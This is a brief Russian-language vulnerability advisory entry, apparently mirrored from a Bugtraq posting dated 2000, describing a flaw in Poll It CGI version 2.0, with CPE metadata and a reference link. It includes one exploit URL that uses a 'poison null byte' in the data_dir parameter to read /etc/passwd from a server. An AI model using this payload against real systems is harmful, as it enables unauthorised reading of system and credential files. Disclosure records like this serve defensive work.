Дырка в Pollit CGI

2000-07-1100:00:00

BUGTRAQ

vulners.com

Используя "ядовитый NUll" можно получить любой файл с сервера:http://www.targethost.com/pollit/Poll_It_v2.0.cgi?data_dir=\etc\passwd%00

CPENameOperatorVersion
poll iteq2.0

CPE	Name	Operator	Version
	poll it	eq	2.0

References

vulners.com/securityvulns/securityvulns:doc:427